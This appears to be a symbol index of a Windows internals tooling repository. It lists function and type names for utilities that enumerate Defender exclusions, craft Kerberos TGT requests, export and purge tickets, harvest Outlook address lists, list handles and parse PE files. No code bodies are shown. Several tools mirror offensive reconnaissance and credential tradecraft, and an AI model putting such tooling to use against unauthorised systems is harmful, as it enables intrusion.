type AppIdPolicyHandlerVtbl (line 68) | typedef struct AppIdPolicyHandlerVtbl {
function interface (line 194) | interface IAppIdPolicyHandler {
FILE: AppLocker/List Policies/main.c
function VOID (line 23) | VOID ShowUsage() {
function BOOL (line 42) | BOOL GetAppLockerPolicies(PWORD pwAppLockerMode, LPBSTR pbstrLdapPath, L...
function INT (line 87) | INT wmain(INT argc, PWCHAR argv[]) {
FILE: Cryptography/AES CNG/source/AES.cpp
type CNG (line 14) | namespace CNG {
function BOOL (line 37) | BOOL WINAPI AES::Initialise() {
function BOOL (line 85) | BOOL WINAPI AESEncrypt::SetBase64StringToEncrypt(std::string sPlaintex...
function BOOL (line 97) | BOOL WINAPI AESEncrypt::SetStringToEncrypt(std::string sPlaintext) {
function BOOL (line 110) | BOOL WINAPI AESDecrypt::SetStringToDecrypt(std::string sCipherText) {
function BOOL (line 123) | BOOL WINAPI AESDecrypt::SetBase64StringToDecrypt(std::string sCipherTe...
function BOOL (line 135) | BOOL WINAPI AESEncrypt::Encrypt() {
function BOOL (line 170) | BOOL WINAPI AESDecrypt::Decrypt() {
FILE: Cryptography/AES CNG/source/AES.h
function namespace (line 5) | namespace CNG {
FILE: Cryptography/AES CNG/source/Base64.h
function GetDecodedLength (line 12) | size_t GetDecodedLength(std::string EncodedString) {
function namespace (line 26) | namespace Base64 {
FILE: Cryptography/AES CNG/source/Main.cpp
function EasyEncrypt (line 17) | std::string EasyEncrypt(std::string sPlaintext) {
function EasyDecrypt (line 43) | std::string EasyDecrypt(std::string sCipherText) {
function wmain (line 69) | int wmain(int argc, wchar_t* argv[]) {
FILE: Cryptography/AES CNG/source/Util.cpp
type CNG (line 12) | namespace CNG {
function VOID (line 13) | VOID WINAPI Util::WriteSuccessMessage(std::wstring wsBuffer) {
function VOID (line 18) | VOID WINAPI Util::WriteSuccessMessage(std::wstring wsBuffer, int tabs) {
function VOID (line 25) | VOID WINAPI Util::WriteErrorMessage(std::wstring wsBuffer) {
function VOID (line 30) | VOID WINAPI Util::WriteErrorMessage(std::wstring wsBuffer, int tabs) {
function VOID (line 37) | VOID WINAPI Util::WriteInfoMessage(std::wstring wsBuffer) {
function VOID (line 42) | VOID WINAPI Util::WriteInfoMessage(std::wstring wsBuffer, int tabs) {
function VOID (line 49) | VOID WINAPI Util::WriteMessage(std::wstring wsBuffer) {
FILE: Cryptography/AES CNG/source/Util.h
function namespace (line 10) | namespace CNG {
FILE: DIA/inc/callback.h
type DiaCallback (line 24) | typedef struct DiaCallback {
FILE: DIA/inc/interface.h
type PUBLIC_SYMBOL (line 35) | typedef struct _PUBLIC_SYMBOL {
FILE: DIA/inc/msdia/include/cvconst.h
type CV_call_e (line 15) | typedef enum CV_call_e
type CV_access_e (line 53) | typedef enum CV_access_e
type THUNK_ORDINAL (line 61) | typedef enum THUNK_ORDINAL
type CV_SourceChksum_t (line 80) | enum CV_SourceChksum_t
type SymTagEnum (line 92) | enum SymTagEnum
type LocationType (line 140) | enum LocationType
type DataKind (line 157) | enum DataKind
type UdtKind (line 171) | enum UdtKind
type BasicType (line 179) | enum BasicType
type CV_modifier_e (line 207) | typedef enum CV_modifier_e
type CV_builtin_e (line 245) | typedef enum CV_builtin_e
type CV_CFL_LANG (line 298) | typedef enum CV_CFL_LANG
type CV_CPU_TYPE_e (line 328) | typedef enum CV_CPU_TYPE_e
type CV_HREG_e (line 401) | typedef enum CV_HREG_e
type CV_HLSLREG_e (line 4026) | typedef enum CV_HLSLREG_e
type StackFrameTypeEnum (line 4071) | enum StackFrameTypeEnum
type MemoryTypeEnum (line 4082) | enum MemoryTypeEnum
type CV_HLSLMemorySpace_e (line 4092) | typedef enum CV_HLSLMemorySpace_e
type CV_CoroutineKind_e (line 4115) | typedef enum CV_CoroutineKind_e
type CV_AssociationKind_e (line 4124) | typedef enum CV_AssociationKind_e
FILE: DIA/inc/msdia/include/dia2.h
type interface (line 45) | typedef interface IDiaLoadCallback
type interface (line 52) | typedef interface IDiaLoadCallback2
type interface (line 59) | typedef interface IDiaReadExeAtOffsetCallback
type interface (line 66) | typedef interface IDiaReadExeAtRVACallback
type interface (line 73) | typedef interface IDiaDataSource
type interface (line 80) | typedef interface IDiaEnumSymbols
type interface (line 87) | typedef interface IDiaEnumSymbolsByAddr
type interface (line 94) | typedef interface IDiaEnumSymbolsByAddr2
type interface (line 101) | typedef interface IDiaEnumSourceFiles
type interface (line 108) | typedef interface IDiaEnumInputAssemblyFiles
type interface (line 115) | typedef interface IDiaEnumLineNumbers
type interface (line 122) | typedef interface IDiaEnumInjectedSources
type interface (line 129) | typedef interface IDiaEnumSegments
type interface (line 136) | typedef interface IDiaEnumSectionContribs
type interface (line 143) | typedef interface IDiaEnumFrameData
type interface (line 150) | typedef interface IDiaEnumDebugStreamData
type interface (line 157) | typedef interface IDiaEnumDebugStreams
type interface (line 164) | typedef interface IDiaAddressMap
type interface (line 171) | typedef interface IDiaSession
type interface (line 178) | typedef interface IDiaSymbol
type interface (line 185) | typedef interface IDiaSymbol2
type interface (line 192) | typedef interface IDiaSymbol3
type interface (line 199) | typedef interface IDiaSymbol4
type interface (line 206) | typedef interface IDiaSymbol5
type interface (line 213) | typedef interface IDiaSymbol6
type interface (line 220) | typedef interface IDiaSymbol7
type interface (line 227) | typedef interface IDiaSymbol8
type interface (line 234) | typedef interface IDiaSymbol9
type interface (line 241) | typedef interface IDiaSymbol10
type interface (line 248) | typedef interface IDiaSourceFile
type interface (line 255) | typedef interface IDiaInputAssemblyFile
type interface (line 262) | typedef interface IDiaLineNumber
type interface (line 269) | typedef interface IDiaSectionContrib
type interface (line 276) | typedef interface IDiaSegment
type interface (line 283) | typedef interface IDiaInjectedSource
type interface (line 290) | typedef interface IDiaStackWalkFrame
type interface (line 297) | typedef interface IDiaFrameData
type interface (line 304) | typedef interface IDiaImageData
type interface (line 311) | typedef interface IDiaTable IDiaTable;
type interface (line 318) | typedef interface IDiaEnumTables
type class (line 327) | typedef class DiaSource DiaSource;
type DiaSource (line 329) | typedef struct DiaSource DiaSource;
type class (line 339) | typedef class DiaSourceAlt
type DiaSourceAlt (line 341) | typedef struct DiaSourceAlt DiaSourceAlt;
type class (line 351) | typedef class DiaStackWalker
type DiaStackWalker (line 353) | typedef struct DiaStackWalker DiaStackWalker;
type interface (line 361) | typedef interface IDiaSectionContrib
type interface (line 368) | typedef interface IDiaEnumSectionContribs
type interface (line 375) | typedef interface IDiaSymbol
type interface (line 382) | typedef interface IDiaSymbol2
type interface (line 389) | typedef interface IDiaSymbol3
type interface (line 396) | typedef interface IDiaSymbol4
type interface (line 403) | typedef interface IDiaSymbol5
type interface (line 410) | typedef interface IDiaSymbol6
type interface (line 417) | typedef interface IDiaSymbol7
type interface (line 424) | typedef interface IDiaSymbol8
type interface (line 431) | typedef interface IDiaSymbol9
type interface (line 438) | typedef interface IDiaSymbol10
type interface (line 445) | typedef interface IDiaEnumSymbolsByAddr
type interface (line 452) | typedef interface IDiaEnumSymbolsByAddr2
type interface (line 459) | typedef interface IDiaPropertyStorage
type interface (line 466) | typedef interface IDiaStackFrame
type interface (line 473) | typedef interface IDiaEnumStackFrames
type interface (line 480) | typedef interface IDiaStackWalkHelper
type interface (line 487) | typedef interface IDiaStackWalker
type interface (line 494) | typedef interface IDiaStackWalkHelper2
type interface (line 501) | typedef interface IDiaStackWalker2
type NameSearchOptions (line 521) | enum NameSearchOptions
type __MIDL___MIDL_itf_dia2_0000_0000_0001 (line 536) | enum __MIDL___MIDL_itf_dia2_0000_0000_0001
type IDiaLoadCallbackVtbl (line 629) | typedef struct IDiaLoadCallbackVtbl
function interface (line 670) | interface IDiaLoadCallback
type IDiaLoadCallback2Vtbl (line 744) | typedef struct IDiaLoadCallback2Vtbl
function interface (line 797) | interface IDiaLoadCallback2
type IDiaReadExeAtOffsetCallbackVtbl (line 882) | typedef struct IDiaReadExeAtOffsetCallbackVtbl
function interface (line 908) | interface IDiaReadExeAtOffsetCallback
type IDiaReadExeAtRVACallbackVtbl (line 968) | typedef struct IDiaReadExeAtRVACallbackVtbl
function interface (line 994) | interface IDiaReadExeAtRVACallback
type IDiaDataSourceVtbl (line 1088) | typedef struct IDiaDataSourceVtbl
function interface (line 1155) | interface IDiaDataSource
type IDiaEnumSymbolsVtbl (line 1253) | typedef struct IDiaEnumSymbolsVtbl
function interface (line 1302) | interface IDiaEnumSymbols
type IDiaEnumSymbolsByAddrVtbl (line 1400) | typedef struct IDiaEnumSymbolsByAddrVtbl
function interface (line 1451) | interface IDiaEnumSymbolsByAddr
type IDiaEnumSymbolsByAddr2Vtbl (line 1548) | typedef struct IDiaEnumSymbolsByAddr2Vtbl
function interface (line 1632) | interface IDiaEnumSymbolsByAddr2
type IDiaEnumSourceFilesVtbl (line 1740) | typedef struct IDiaEnumSourceFilesVtbl
function interface (line 1789) | interface IDiaEnumSourceFiles
type IDiaEnumInputAssemblyFilesVtbl (line 1884) | typedef struct IDiaEnumInputAssemblyFilesVtbl
function interface (line 1933) | interface IDiaEnumInputAssemblyFiles
type IDiaEnumLineNumbersVtbl (line 2028) | typedef struct IDiaEnumLineNumbersVtbl
function interface (line 2077) | interface IDiaEnumLineNumbers
type IDiaEnumInjectedSourcesVtbl (line 2172) | typedef struct IDiaEnumInjectedSourcesVtbl
function interface (line 2221) | interface IDiaEnumInjectedSources
type IDiaEnumSegmentsVtbl (line 2316) | typedef struct IDiaEnumSegmentsVtbl
function interface (line 2365) | interface IDiaEnumSegments
type IDiaEnumSectionContribsVtbl (line 2460) | typedef struct IDiaEnumSectionContribsVtbl
function interface (line 2509) | interface IDiaEnumSectionContribs
type IDiaEnumFrameDataVtbl (line 2612) | typedef struct IDiaEnumFrameDataVtbl
function interface (line 2671) | interface IDiaEnumFrameData
type IDiaEnumDebugStreamDataVtbl (line 2779) | typedef struct IDiaEnumDebugStreamDataVtbl
function interface (line 2836) | interface IDiaEnumDebugStreamData
type IDiaEnumDebugStreamsVtbl (line 2934) | typedef struct IDiaEnumDebugStreamsVtbl
function interface (line 2983) | interface IDiaEnumDebugStreams
type DiaAddressMapEntry (line 3038) | struct DiaAddressMapEntry
type DiaAddressMapEntry (line 3088) | struct DiaAddressMapEntry
type IDiaAddressMapVtbl (line 3096) | typedef struct IDiaAddressMapVtbl
function interface (line 3151) | interface IDiaAddressMap
type SymTagEnum (line 3238) | enum SymTagEnum
type SymTagEnum (line 3245) | enum SymTagEnum
type SymTagEnum (line 3252) | enum SymTagEnum
type SymTagEnum (line 3261) | enum SymTagEnum
type SymTagEnum (line 3269) | enum SymTagEnum
type SymTagEnum (line 3278) | enum SymTagEnum
type SymTagEnum (line 3283) | enum SymTagEnum
type SymTagEnum (line 3288) | enum SymTagEnum
type SymTagEnum (line 3293) | enum SymTagEnum
type SymTagEnum (line 3306) | enum SymTagEnum
type SymTagEnum (line 3312) | enum SymTagEnum
type IDiaSessionVtbl (line 3527) | typedef struct IDiaSessionVtbl
function interface (line 3906) | interface IDiaSession
type SymTagEnum (line 4378) | enum SymTagEnum
type SymTagEnum (line 4384) | enum SymTagEnum
type SymTagEnum (line 4390) | enum SymTagEnum
type SymTagEnum (line 4398) | enum SymTagEnum
type SymTagEnum (line 4405) | enum SymTagEnum
type IDiaSymbolVtbl (line 4888) | typedef struct IDiaSymbolVtbl
function interface (line 5897) | interface IDiaSymbol
type IDiaSymbol2Vtbl (line 8017) | typedef struct IDiaSymbol2Vtbl
function interface (line 9038) | interface IDiaSymbol2
type IDiaSymbol3Vtbl (line 9849) | typedef struct IDiaSymbol3Vtbl
function interface (line 10878) | interface IDiaSymbol3
type IDiaSymbol4Vtbl (line 11681) | typedef struct IDiaSymbol4Vtbl
function interface (line 12714) | interface IDiaSymbol4
type IDiaSymbol5Vtbl (line 13509) | typedef struct IDiaSymbol5Vtbl
function interface (line 14546) | interface IDiaSymbol5
type IDiaSymbol6Vtbl (line 15345) | typedef struct IDiaSymbol6Vtbl
function interface (line 16386) | interface IDiaSymbol6
type IDiaSymbol7Vtbl (line 17189) | typedef struct IDiaSymbol7Vtbl
function interface (line 18234) | interface IDiaSymbol7
type IDiaSymbol8Vtbl (line 19056) | typedef struct IDiaSymbol8Vtbl
function interface (line 20125) | interface IDiaSymbol8
type IDiaSymbol9Vtbl (line 21017) | typedef struct IDiaSymbol9Vtbl
function interface (line 22098) | interface IDiaSymbol9
type IDiaSymbol10Vtbl (line 22960) | typedef struct IDiaSymbol10Vtbl
function interface (line 24047) | interface IDiaSymbol10
type IDiaSourceFileVtbl (line 24903) | typedef struct IDiaSourceFileVtbl
function interface (line 24944) | interface IDiaSourceFile
type IDiaInputAssemblyFileVtbl (line 25030) | typedef struct IDiaInputAssemblyFileVtbl
function interface (line 25075) | interface IDiaInputAssemblyFile
type IDiaLineNumberVtbl (line 25186) | typedef struct IDiaLineNumberVtbl
function interface (line 25261) | interface IDiaLineNumber
type IDiaSectionContribVtbl (line 25420) | typedef struct IDiaSectionContribVtbl
function interface (line 25527) | interface IDiaSectionContrib
type IDiaSegmentVtbl (line 25671) | typedef struct IDiaSegmentVtbl
function interface (line 25726) | interface IDiaSegment
type IDiaInjectedSourceVtbl (line 25827) | typedef struct IDiaInjectedSourceVtbl
function interface (line 25876) | interface IDiaInjectedSource
type __MIDL___MIDL_itf_dia2_0000_0035_0001 (line 25932) | enum __MIDL___MIDL_itf_dia2_0000_0035_0001
type MemoryTypeEnum (line 25968) | enum MemoryTypeEnum
type IDiaStackWalkFrameVtbl (line 25988) | typedef struct IDiaStackWalkFrameVtbl
function interface (line 26036) | interface IDiaStackWalkFrame
type IDiaFrameDataVtbl (line 26156) | typedef struct IDiaFrameDataVtbl
function interface (line 26247) | interface IDiaFrameData
type IDiaImageDataVtbl (line 26361) | typedef struct IDiaImageDataVtbl
function interface (line 26392) | interface IDiaImageData
type IDiaTableVtbl (line 26465) | typedef struct IDiaTableVtbl
function interface (line 26521) | interface IDiaTable
type IDiaEnumTablesVtbl (line 26620) | typedef struct IDiaEnumTablesVtbl
function interface (line 26669) | interface IDiaEnumTables
type IDiaPropertyStorageVtbl (line 26839) | typedef struct IDiaPropertyStorageVtbl
function interface (line 26899) | interface IDiaPropertyStorage
type IDiaStackFrameVtbl (line 27020) | typedef struct IDiaStackFrameVtbl
function interface (line 27100) | interface IDiaStackFrame
type IDiaEnumStackFramesVtbl (line 27203) | typedef struct IDiaEnumStackFramesVtbl
function interface (line 27231) | interface IDiaEnumStackFrames
type FPODATA (line 27271) | typedef /* [public] */ struct __MIDL___MIDL_itf_dia2_0000_0044_0001
type MemoryTypeEnum (line 27309) | enum MemoryTypeEnum
type IDiaStackWalkHelperVtbl (line 27364) | typedef struct IDiaStackWalkHelperVtbl
function interface (line 27454) | interface IDiaStackWalkHelper
type CV_CPU_TYPE_e (line 27541) | enum CV_CPU_TYPE_e
type IDiaStackWalkerVtbl (line 27550) | typedef struct IDiaStackWalkerVtbl
function interface (line 27580) | interface IDiaStackWalker
type IDiaStackWalkHelper2Vtbl (line 27637) | typedef struct IDiaStackWalkHelper2Vtbl
function interface (line 27727) | interface IDiaStackWalkHelper2
type IDiaStackWalker2Vtbl (line 27815) | typedef struct IDiaStackWalker2Vtbl
function interface (line 27845) | interface IDiaStackWalker2
FILE: DIA/inc/msdia/include/diacreate.h
function HRESULT (line 22) | HRESULT STDMETHODCALLTYPE NoRegCoCreate( const wchar_t *dllName,
FILE: DIA/src/callback.c
function HRESULT (line 36) | HRESULT STDMETHODCALLTYPE QueryInterface(
function ULONG (line 60) | ULONG STDMETHODCALLTYPE AddRef(
function ULONG (line 67) | ULONG STDMETHODCALLTYPE Release(
function HRESULT (line 79) | HRESULT STDMETHODCALLTYPE NotifyDebugDir(
function HRESULT (line 88) | HRESULT STDMETHODCALLTYPE NotifyOpenDBG(
function HRESULT (line 96) | HRESULT STDMETHODCALLTYPE NotifyOpenPDB(
function HRESULT (line 107) | HRESULT STDMETHODCALLTYPE RestrictRegistryAccess(
function HRESULT (line 114) | HRESULT STDMETHODCALLTYPE RestrictSymbolServerAccess(
function HRESULT (line 121) | HRESULT STDMETHODCALLTYPE RestrictOriginalPathAccess(
function HRESULT (line 128) | HRESULT STDMETHODCALLTYPE RestrictReferencePathAccess(
function HRESULT (line 135) | HRESULT STDMETHODCALLTYPE RestrictDBGAccess(
function HRESULT (line 141) | HRESULT STDMETHODCALLTYPE RestrictSystemRootAccess(
function STDMETHODCALLTYPE (line 169) | STDMETHODCALLTYPE DiaCallbackHelper(
FILE: DIA/src/dirutil.c
function _Use_decl_annotations_ (line 30) | _Use_decl_annotations_
function _Use_decl_annotations_ (line 83) | _Use_decl_annotations_
function PWCHAR (line 125) | PWCHAR GetMsdiaModulePath(
function _Use_decl_annotations_ (line 172) | _Use_decl_annotations_
FILE: DIA/src/interface.c
function STDMETHODCALLTYPE (line 43) | STDMETHODCALLTYPE DiaInitialise(
function STDMETHODCALLTYPE (line 84) | STDMETHODCALLTYPE DiaUninitialise() {
function STDMETHODCALLTYPE (line 110) | STDMETHODCALLTYPE DiaLoadDataFromPdb(
function STDMETHODCALLTYPE (line 185) | STDMETHODCALLTYPE DiaFindPublicSymbols(
FILE: DIA/src/main.c
function VOID (line 21) | VOID SortTable(
function INT (line 56) | INT main(VOID) {
FILE: Defender/ExclusionLists/inc/defender.h
type DEFENDER_EXCLUSION_TYPE (line 19) | typedef enum _DEFENDER_EXCLUSION_TYPE {
type DEFENDER_EXCLUSION_ENTRY (line 30) | typedef struct _DEFENDER_EXCLUSION_ENTRY {
type DEFENDER_EXCLUSION_LIST (line 41) | typedef struct _DEFENDER_EXCLUSION_LIST {
FILE: Defender/ExclusionLists/main.c
function INT (line 20) | INT main() {
FILE: Defender/ExclusionLists/src/defender.c
function STDMETHODCALLTYPE (line 16) | STDMETHODCALLTYPE DfdGetAllExclusions(
function STDMETHODCALLTYPE (line 125) | STDMETHODCALLTYPE DfdpGetExclusionEntries(
function STDMETHODCALLTYPE (line 247) | STDMETHODCALLTYPE DfdpCleanup(
FILE: Fusion/FindAssembly/Fusion/GACUtil.cs
type FUSION_INSTALL_REFERENCE (line 8) | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
type ASSEMBLY_INFO (line 17) | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
type ASSEMBLY_VERSION (line 26) | public struct ASSEMBLY_VERSION {
type ASSEMBLY_IDENTITY (line 33) | public struct ASSEMBLY_IDENTITY {
type ASM_CACHE_FLAGS (line 39) | public enum ASM_CACHE_FLAGS : uint {
class GACUtil (line 47) | public class GACUtil {
method GACUtil (line 68) | public GACUtil() {
method ParseAllAssembliesInternal (line 97) | private uint ParseAllAssembliesInternal(string wszFilter, short wMajor...
method ParseAllAssemblies (line 130) | public uint ParseAllAssemblies() {
method FindAssembly (line 144) | public uint FindAssembly(string wszAssemblyName, short wMajor, ref ASS...
method GetAssemblyName (line 158) | public uint GetAssemblyName(ref IAssemblyName pIAssemblyName, ref stri...
method GetAssemblyGACPath (line 182) | public uint GetAssemblyGACPath(ref string wszAssemblyName, ref string ...
method GetAssemblyVersion (line 210) | public uint GetAssemblyVersion(ref IAssemblyName pIAssemblyName, ref A...
FILE: Fusion/FindAssembly/Fusion/IAssemblyCache.cs
type IAssemblyCache (line 9) | [ComImport, Guid("E707DCDE-D1CD-11D2-BAB9-00C04F8ECEAE")]
method UninstallAssembly (line 30) | [PreserveSig]
method QueryAssemblyInfo (line 50) | [PreserveSig]
method CreateAssemblyCacheItem (line 70) | [PreserveSig]
method CreateAssemblyScavenger (line 83) | [PreserveSig]
method InstallAssembly (line 98) | [PreserveSig]
FILE: Fusion/FindAssembly/Fusion/IAssemblyCacheItem.cs
type IAssemblyCacheItem (line 8) | [ComImport, Guid("9E3AAEB4-D1CD-11D2-BAB9-00C04F8ECEAE")]
method AbortItem (line 16) | [PreserveSig]
method Commit (line 25) | [PreserveSig]
method CreateStream (line 41) | [PreserveSig]
FILE: Fusion/FindAssembly/Fusion/IAssemblyEnum.cs
type IAssemblyEnum (line 9) | [ComImport, Guid("21B8916C-F28E-11D2-A473-00C04F8EF448")]
method GetNextAssembly (line 20) | [PreserveSig]
method Reset (line 31) | [PreserveSig]
method Clone (line 39) | [PreserveSig]
FILE: Fusion/FindAssembly/Fusion/IAssemblyName.cs
type IAssemblyName (line 10) | [ComImport, Guid("CD193BC0-B4BC-11d2-9833-00C04FC31D2E")]
method SetProperty (line 21) | [PreserveSig]
method GetProperty (line 35) | [PreserveSig]
method Finalize (line 46) | [PreserveSig]
method GetDisplayName (line 56) | [PreserveSig]
method Reserved (line 67) | [PreserveSig]
method GetName (line 85) | [PreserveSig]
method GetVersion (line 97) | [PreserveSig]
method IsEqual (line 109) | [PreserveSig]
method Clone (line 120) | [PreserveSig]
FILE: Fusion/FindAssembly/Program.cs
class Program (line 6) | internal sealed class Program {
method Main (line 7) | static void Main(string[] args) {
FILE: Fusion/FindAssembly/Win32/Functions.cs
class Functions (line 6) | internal class Functions {
method CreateAssemblyEnum (line 8) | [DllImport("fusion.dll", CharSet = CharSet.Auto)]
method CreateAssemblyCache (line 18) | [DllImport("fusion.dll", CharSet = CharSet.Auto)]
FILE: Fusion/FindAssembly/Win32/Macros.cs
class Macros (line 3) | public static class Macros {
method SUCCEEDED (line 5) | public static bool SUCCEEDED(uint hr) => hr >= S_OK;
FILE: Fusion/ListAssemblies/gacutil.h
type ASSEMBLY_VERSION (line 29) | typedef struct _ASSEMBLY_VERSION {
type IAssemblyEnum (line 36) | typedef IAssemblyEnum* PIAssemblyEnum;
type PIAssemblyEnum (line 37) | typedef PIAssemblyEnum* PPIAssemblyEnum;
type IAssemblyCache (line 39) | typedef IAssemblyCache* PIAssemblyCache;
type PIAssemblyCache (line 40) | typedef PIAssemblyCache* PPIAssemblyCache;
type IAssemblyName (line 42) | typedef IAssemblyName* PIAssemblyName;
type PIAssemblyName (line 43) | typedef PIAssemblyName* PPIAssemblyName;
FILE: Fusion/ListAssemblies/main.c
function INT (line 28) | INT wmain(INT argc, PWCHAR* argv[]) {
function HRESULT (line 87) | HRESULT ParseAllAssemblies(PPIAssemblyEnum ppIAssemblyEnum, PPIAssemblyC...
function HRESULT (line 142) | HRESULT GetAssemblyName(PPIAssemblyName ppIAssemblyName, LPWSTR* pwszAss...
function HRESULT (line 175) | HRESULT GetAssemblyGACPath(PPIAssemblyCache ppIAssemblyCache, LPWSTR* pw...
function HRESULT (line 213) | HRESULT GetAssemblyVersion(PPIAssemblyName ppIAssemblyName, PASSEMBLY_VE...
FILE: Kerberos/AskTGT/kerberos.c
function NTSTATUS (line 9) | NTSTATUS KerbpFormatTimestamp(
function INT32 (line 28) | INT32 KerbpGetCodePoint(
function NTSTATUS (line 47) | NTSTATUS KerbpEncodeUTF8(
function INT32 (line 85) | INT32 KerbpGetAsnTagLength(
function INT32 (line 102) | INT32 KerbpGetAsnLengthLenght(
function INT32 (line 120) | INT32 KerbpAsnGetEffectiveEncodedLength(
function INT32 (line 136) | INT32 KerbpAsnGetEffectiveValueLenght(
function NTSTATUS (line 159) | NTSTATUS KerbpAsnMakePrimitive(
function NTSTATUS (line 193) | NTSTATUS KerbpAsnMakeConstructed(
function NTSTATUS (line 231) | NTSTATUS KerbpAsnMakeImplicit(
function NTSTATUS (line 273) | NTSTATUS KerbpAsnMakeInteger(
function INT32 (line 313) | INT32 KerbpAnsEncodeValue(
function INT32 (line 352) | INT32 KerbpAsnEncode(
function NTSTATUS (line 430) | NTSTATUS KerbpEncryptInternal(
function NTSTATUS (line 458) | NTSTATUS KerbpEncrypt(
function NTSTATUS (line 515) | NTSTATUS KerbpGenerateTimestamp(
function NTSTATUS (line 594) | NTSTATUS KerbpEncryptTimestamp(
function NTSTATUS (line 640) | NTSTATUS KerbpEncodeEncryptedData(
function NTSTATUS (line 724) | NTSTATUS KerbpGenerateKdcOptions(
function NTSTATUS (line 770) | NTSTATUS KerbpGeneratePrincipalName(
function NTSTATUS (line 927) | NTSTATUS KerbpGenerateRealm(
function NTSTATUS (line 971) | NTSTATUS KerbpGenerateNonce(
function NTSTATUS (line 1000) | NTSTATUS KerbpGenerateEtype(
function NTSTATUS (line 1040) | NTSTATUS KerbGeneratePvnoAndType(
function NTSTATUS (line 1089) | NTSTATUS KerbGenerateEncryptedData(
function NTSTATUS (line 1185) | NTSTATUS KerbGeneratePac(
function NTSTATUS (line 1253) | NTSTATUS KerbGenerateKDCReqBody(
function NTSTATUS (line 1319) | NTSTATUS KerbGenerateFinalRequest(
FILE: Kerberos/AskTGT/kerberos.h
type ASN_ELEMENT (line 177) | typedef struct _ASN_ELEMENT {
type ENCRYPTED_DATA (line 198) | typedef struct _ENCRYPTED_DATA {
type KERBEROS_ECRYPT (line 207) | typedef struct _KERBEROS_ECRYPT {
FILE: Kerberos/AskTGT/main.c
function NTSTATUS (line 24) | NTSTATUS GetDomainControllerInformation(
function NTSTATUS (line 54) | NTSTATUS HexStringToHex(
function NTSTATUS (line 73) | NTSTATUS GenerateASRequest(
function INT (line 122) | INT main() {
FILE: Kerberos/AskTGT/socket.c
function NTSTATUS (line 7) | NTSTATUS SockpInitialise() {
function NTSTATUS (line 16) | NTSTATUS SockpUninitialise() {
function NTSTATUS (line 24) | NTSTATUS SockSendKerberosASRequest(
FILE: Kerberos/GetTicket/src/main.c
function NTSTATUS (line 65) | NTSTATUS GetLsaHandleAndPackageId(
function VOID (line 85) | VOID PrintUnicodeString(
function VOID (line 105) | VOID PrintEType(
function VOID (line 161) | VOID PrintTicketFlags(
function VOID (line 188) | VOID PrintTime(
function VOID (line 215) | VOID PrintEncodedTicket(
function INT (line 256) | INT main() {
FILE: Kerberos/List/src/main.c
function NTSTATUS (line 89) | NTSTATUS GetLsaHandleAndPackageId(
function VOID (line 108) | VOID PrintEType(
function VOID (line 164) | VOID PrintTicketFlags(
function VOID (line 190) | VOID PrintCacheFlags(
function VOID (line 212) | VOID PrintTime(
function VOID (line 233) | VOID ShowTicket3(
function VOID (line 299) | VOID ShowTicket2(
function VOID (line 355) | VOID ShowTicket1(
function INT (line 407) | INT main() {
FILE: Kerberos/Purge/src/main.c
function NTSTATUS (line 28) | NTSTATUS GetLsaHandleAndPackageId(
function INT (line 44) | INT main() {
FILE: Object Manager/List Handles/main.c
function INT (line 74) | INT wmain(INT argc, PWCHAR argv[]) {
function NTSTATUS (line 171) | NTSTATUS GetRemoteProcessHandlesSnapshotInformation(PPROCESS_HANDLE_SNAP...
function NTSTATUS (line 209) | NTSTATUS GetObjNameByHandle(PHANDLE pObjHandle, PUNICODE_STRING pObjName...
function NTSTATUS (line 243) | NTSTATUS GetObjTypeByHandle(PHANDLE pObjHandle, PUNICODE_STRING pObjType...
function NTSTATUS (line 277) | NTSTATUS GetObjBasicInformationByHandle(PHANDLE pObjHandle, PACCESS_MASK...
FILE: Object Manager/List Handles/ntstructs.h
type UNICODE_STRING (line 18) | typedef struct _UNICODE_STRING {
type OBJECT_NAME_INFORMATION (line 24) | typedef struct _OBJECT_NAME_INFORMATION {
type PUBLIC_OBJECT_BASIC_INFORMATION (line 28) | typedef struct _PUBLIC_OBJECT_BASIC_INFORMATION {
type PUBLIC_OBJECT_TYPE_INFORMATION (line 36) | typedef struct _PUBLIC_OBJECT_TYPE_INFORMATION {
type PROCESS_HANDLE_TABLE_ENTRY_INFO (line 41) | typedef struct _PROCESS_HANDLE_TABLE_ENTRY_INFO {
type PROCESS_HANDLE_SNAPSHOT_INFORMATION (line 51) | typedef struct _PROCESS_HANDLE_SNAPSHOT_INFORMATION {
FILE: Object Manager/List Objects/main.c
function INT (line 73) | INT wmain(INT argc, PWCHAR argv[]) {
function NTSTATUS (line 162) | NTSTATUS GetObjInformation(PUNICODE_STRING pObjName, PUNICODE_STRING pOb...
function NTSTATUS (line 203) | NTSTATUS GetObjSymbolicLinkTarget(PUNICODE_STRING pObjSymbolicLinkTarget...
FILE: Object Manager/List Objects/ntstructs.h
type LSA_UNICODE_STRING (line 33) | typedef struct _LSA_UNICODE_STRING {
type OBJECT_ATTRIBUTES (line 39) | typedef struct _OBJECT_ATTRIBUTES {
type OBJECT_DIRECTORY_INFORMATION (line 48) | typedef struct _OBJECT_DIRECTORY_INFORMATION {
type DirectoryAccess (line 53) | enum DirectoryAccess {
FILE: Office/Outlook/inc/outlook.h
type OutlookContactRecord (line 27) | typedef struct _OutlookContactRecord {
type OlAddressEntryUserType (line 41) | typedef enum _OlAddressEntryUserType {
type OutlookUtil (line 58) | typedef struct OutlookUtil OutlookUtil;
type OutlookUtilVtbl (line 60) | typedef struct OutlookUtilVtbl OutlookUtilVtbl;
type OutlookUtilVtbl (line 65) | struct OutlookUtilVtbl {
type OutlookUtil (line 93) | struct OutlookUtil {
FILE: Office/Outlook/src/main.c
function main (line 17) | int main() {
FILE: Office/Outlook/src/outlook.c
function STDMETHODCALLTYPE (line 18) | STDMETHODCALLTYPE Initialise(
function STDMETHODCALLTYPE (line 30) | STDMETHODCALLTYPE Uninitialise(
function STDMETHODCALLTYPE (line 42) | STDMETHODCALLTYPE OuCreateOutlookUtilClass(
function _Use_decl_annotations_ (line 69) | _Use_decl_annotations_
function STDMETHODCALLTYPE (line 83) | STDMETHODCALLTYPE GetGlobalAddressList(
function STDMETHODCALLTYPE (line 225) | STDMETHODCALLTYPE OupGetApplicationDispatchInterface(
function STDMETHODCALLTYPE (line 252) | STDMETHODCALLTYPE OupGetDispatchInterface(
function STDMETHODCALLTYPE (line 314) | STDMETHODCALLTYPE OupGetDispatchInterfaceProperty(
FILE: Portable Executable/parse_header.c
type LSA_UNICODE_STRING (line 22) | typedef struct _LSA_UNICODE_STRING {
type LDR_MODULE (line 28) | typedef struct _LDR_MODULE {
